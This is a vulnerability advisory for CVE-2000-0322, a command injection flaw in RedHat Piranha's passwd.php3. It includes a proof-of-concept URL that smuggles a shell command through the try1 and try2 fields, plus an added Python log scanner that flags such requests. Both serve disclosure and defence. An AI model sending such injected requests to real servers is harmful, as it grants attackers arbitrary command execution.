

Title: RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability
Published: 2000-04-24-12:00AM
Updated: 2000-04-24-12:00AM
Class: Input Validation Error
CVE: CVE-2000-0322
Remote: Yes
Local: No
Credit: This vulnerability was announced on April 24, 2000 in an advisory from ISS. Exploit details were provided in a post to the Bugtraq mailing list by Max Vision <vision@whitehats.com>.
Vulnerable:
  RedHat piranhagui0.4.121.i386.rpm
  RedHat Linux 6.2
  RedHat Linux 6.2 sparc
  RedHat Linux 6.2 i386
  RedHat Linux 6.2 alpha
Not Vulnerable:
Code: Request the following URL, using a username and password to authenticate:
http://victim.example.com/piranha/secure/passwd.php3

Next, request the following URL:
http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT

This creates a file named r00ted in /tmp. More complex attacks are certainly possible.
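For defenders reviewing web server logs, the request pattern above can be flagged by decoding the try1 and try2 query parameters and checking them for shell metacharacters. The following is an added example, not part of the original advisory; the log format (Common/Combined Log Format), the metacharacter list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET_PATH = "/piranha/secure/passwd.php3"   # page named in the advisory
PASSWORD_PARAMS = ("try1", "try2")            # parameters used in its example URL
# Assumed list of characters that can chain or substitute shell commands.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n\r]")
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the last request is the URL shown above.
SAMPLE_LOG = [
    '192.0.2.10 - admin [24/Apr/2000:10:00:01 +0000] '
    '"GET /piranha/secure/passwd.php3 HTTP/1.0" 200 1432',
    '192.0.2.10 - admin [24/Apr/2000:10:00:09 +0000] '
    '"GET /piranha/secure/passwd.php3?try1=Sunsh1ne&try2=Sunsh1ne&passwd=ACCEPT HTTP/1.0" 200 1501',
    '198.51.100.7 - admin [24/Apr/2000:10:03:44 +0000] '
    '"GET /piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B'
    '&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT HTTP/1.0" 200 1501',
]


def suspicious_params(log_line):
    """Return the try1/try2 parameter names whose decoded value contains a
    shell metacharacter; [] if the line is not a request for passwd.php3."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if unquote(url.path) != TARGET_PATH:
        return []
    # parse_qs percent-decodes values and turns '+' into a space, so an
    # encoded ';' (%3B) is matched in its decoded form.
    query = parse_qs(url.query, keep_blank_values=True)
    return [name for name in PASSWORD_PARAMS
            if any(SHELL_META.search(v) for v in query.get(name, []))]


def scan(lines):
    """Return (line_number, parameter_names) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        names = suspicious_params(line)
        if names:
            hits.append((number, names))
    return hits


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: shell metacharacters in {', '.join(names)}")
```

A legitimate password that happens to contain one of the listed characters is flagged too, so treat hits as leads for triage rather than confirmed compromise.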

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 06:12:24 +0000
